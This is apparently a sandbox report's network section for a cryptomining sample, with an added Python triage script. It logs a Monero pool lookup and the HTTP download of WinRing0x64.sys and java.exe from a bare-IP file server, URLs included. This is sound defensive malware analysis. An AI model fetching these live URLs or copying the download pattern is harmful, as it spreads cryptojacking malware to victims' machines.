Network Analysis

DNS Requests

Name | Response | Post-Analysis Lookup
---|---|---
xmr.f2pool.com | CNAME gf.f2pool.com | 203.107.32.162
UDP Requests

Source | Destination | Service (by port)
---|---|---
192.168.56.101:61479 | 164.124.101.2:53 | DNS
192.168.56.101:62324 | 164.124.101.2:53 | DNS
192.168.56.101:137 | 192.168.56.255:137 | NetBIOS name service (subnet broadcast)
192.168.56.101:138 | 192.168.56.255:138 | NetBIOS datagram (subnet broadcast)
192.168.56.101:49152 | 239.255.255.250:3702 | WS-Discovery (multicast)
192.168.56.101:61480 | 239.255.255.250:3702 | WS-Discovery (multicast)
192.168.56.101:62445 | 239.255.255.250:1900 | SSDP (multicast)
192.168.56.101:62447 | 239.255.255.250:3702 | WS-Discovery (multicast)
192.168.56.101:62449 | 239.255.255.250:3702 | WS-Discovery (multicast)
52.231.114.183:123 | 192.168.56.101:123 | NTP (inbound reply)

The two queries to 164.124.101.2:53 are the resolver traffic behind the DNS table above. The remaining entries (NetBIOS broadcast, SSDP and WS-Discovery multicast, one NTP reply) are routine Windows background traffic from the analysis VM and are not, by themselves, evidence of sample activity.
-
HTTP Requests

GET http://154.91.1.118/WinRing0x64.sys -> 200 OK (14544 bytes, served as an attachment)

Request:
GET /WinRing0x64.sys HTTP/1.1
User-Agent: NicoSoft/1.0.1 (+https://nicosoft.org)
Host: 154.91.1.118
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 14544
Accept-Ranges: bytes
Server: HFS 2.4.0 RC6
Set-Cookie: HFS_SID_=pwy60LO05UAAAGDxdZPuPw; path=/; HttpOnly
ETag: a363aafba321723eceb9c85d3eff3b92
Last-Modified: Mon, 06 Sep 2021 03:27:31 GMT
Content-Disposition: attachment; filename*=UTF-8''WinRing0x64.sys; filename=WinRing0x64.sys

GET http://154.91.1.118/java.exe -> 200 OK (586752 bytes, served as an attachment)

Request:
GET /java.exe HTTP/1.1
User-Agent: NicoSoft/1.0.1 (+https://nicosoft.org)
Host: 154.91.1.118
Cache-Control: no-cache
Cookie: HFS_SID_=pwy60LO05UAAAGDxdZPuPw

Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 586752
Accept-Ranges: bytes
Server: HFS 2.4.0 RC6
ETag: 78a5de9d43965b6331dbb2af6af826a8
Last-Modified: Mon, 06 Sep 2021 04:14:40 GMT
Content-Disposition: attachment; filename*=UTF-8''java.exe; filename=java.exe

Both files are fetched over plain HTTP from the same HFS 2.4.0 RC6 instance on a bare IP, with a non-browser User-Agent and Cache-Control: no-cache. The second request carries the HFS_SID_ cookie set by the first, so the two downloads are one client session. Response bodies are not reproduced in the report.
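The items worth an analyst's attention here are a Monero pool hostname (xmr.f2pool.com is f2pool's Monero stratum endpoint) and the download of WinRing0x64.sys (the signed kernel driver XMRig bundles for MSR access) together with a 586752-byte java.exe from an HFS server, none of which the report ties to a process or a hash; the filename alone says nothing about what java.exe actually is. The Python script below is an added example, not part of the sandbox report or of the tool that produced it: it labels each UDP flow by well-known port, separates NetBIOS/SSDP/WS-Discovery/NTP background noise from the rest, and extracts indicators from captured HTTP request and response heads. The sample flows and HTTP heads are reconstructed from the values printed above; the noise set, the indicator rules and the function names are this example's own assumptions.

```python
"""Triage helpers for a sandbox 'Network Analysis' section.

Added example, not part of the original report. Sample data below is
reconstructed from the report's own values; the noise set and indicator
rules are this script's assumptions about what to surface first.
"""
from __future__ import annotations

import re

# Standard port assignments used to label each UDP flow.
UDP_SERVICES = {
    53: "DNS", 123: "NTP", 137: "NetBIOS-NS", 138: "NetBIOS-DGM",
    1900: "SSDP", 3702: "WS-Discovery",
}
# Windows background chatter a sandbox VM emits on its own (assumption).
NOISE = {"NTP", "NetBIOS-NS", "NetBIOS-DGM", "SSDP", "WS-Discovery"}

EXEC_EXT = re.compile(r"\.(exe|dll|sys|scr|bat|cmd|ps1)$", re.IGNORECASE)
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def split_endpoint(endpoint: str) -> tuple[str, int]:
    """'192.168.56.101:61479' -> ('192.168.56.101', 61479)."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def classify_udp(flows: list[tuple[str, str]]) -> list[dict]:
    """Label each (src, dst) flow with a service name and a noise flag.

    The service is taken from whichever side sits on a well-known port, so
    an inbound reply (NTP server -> client) is labelled like the request.
    """
    rows = []
    for src, dst in flows:
        _, sport = split_endpoint(src)
        _, dport = split_endpoint(dst)
        service = UDP_SERVICES.get(dport) or UDP_SERVICES.get(sport) or f"udp/{dport}"
        rows.append({"src": src, "dst": dst, "service": service,
                     "noise": service in NOISE})
    return rows


def parse_http_head(raw: str) -> dict:
    """Parse a request or response head: start line plus headers (keys lowercased)."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"start": lines[0].strip(), "headers": headers}


def http_indicators(request_raw: str, response_raw: str) -> list[str]:
    """Return human-readable reasons an exchange deserves a closer look."""
    req = parse_http_head(request_raw)
    resp = parse_http_head(response_raw)
    method, path, _version = req["start"].split()
    rh, qh = resp["headers"], req["headers"]
    found = []
    if EXEC_EXT.search(path):
        found.append(f"{method} of executable-type path {path}")
    if (rh.get("content-type") == "application/octet-stream"
            and rh.get("content-disposition", "").startswith("attachment")):
        found.append("binary served as an attachment download")
    if rh.get("server", "").startswith("HFS"):
        found.append(f"origin is {rh['server']} (HFS file server)")
    ua = qh.get("user-agent", "")
    if not ua.startswith("Mozilla/"):
        found.append(f"non-browser User-Agent {ua!r}")
    if BARE_IPV4.match(qh.get("host", "")):
        found.append(f"Host header is a bare IP ({qh['host']})")
    return found


# Sample input reconstructed from the report (constructed for this example).
UDP_FLOWS = [
    ("192.168.56.101:61479", "164.124.101.2:53"),
    ("192.168.56.101:62324", "164.124.101.2:53"),
    ("192.168.56.101:137", "192.168.56.255:137"),
    ("192.168.56.101:138", "192.168.56.255:138"),
    ("192.168.56.101:49152", "239.255.255.250:3702"),
    ("192.168.56.101:61480", "239.255.255.250:3702"),
    ("192.168.56.101:62445", "239.255.255.250:1900"),
    ("192.168.56.101:62447", "239.255.255.250:3702"),
    ("192.168.56.101:62449", "239.255.255.250:3702"),
    ("52.231.114.183:123", "192.168.56.101:123"),
]
REQ_SYS = """GET /WinRing0x64.sys HTTP/1.1
User-Agent: NicoSoft/1.0.1 (+https://nicosoft.org)
Host: 154.91.1.118
Cache-Control: no-cache
"""
RESP_SYS = """HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 14544
Server: HFS 2.4.0 RC6
Set-Cookie: HFS_SID_=pwy60LO05UAAAGDxdZPuPw; path=/; HttpOnly
Content-Disposition: attachment; filename*=UTF-8''WinRing0x64.sys; filename=WinRing0x64.sys
"""

if __name__ == "__main__":
    for row in classify_udp(UDP_FLOWS):
        if not row["noise"]:
            print(f"look: {row['src']} -> {row['dst']} [{row['service']}]")
    for reason in http_indicators(REQ_SYS, RESP_SYS):
        print("indicator:", reason)
```

Run stand-alone, the script reports only the two DNS flows as worth a look and lists five indicators for the WinRing0x64.sys download (executable-type path, octet-stream attachment, HFS origin, non-browser User-Agent, bare-IP Host). The same call on the java.exe exchange yields the same five, which is the point: the two requests should be triaged as one session, not as separate findings.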
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts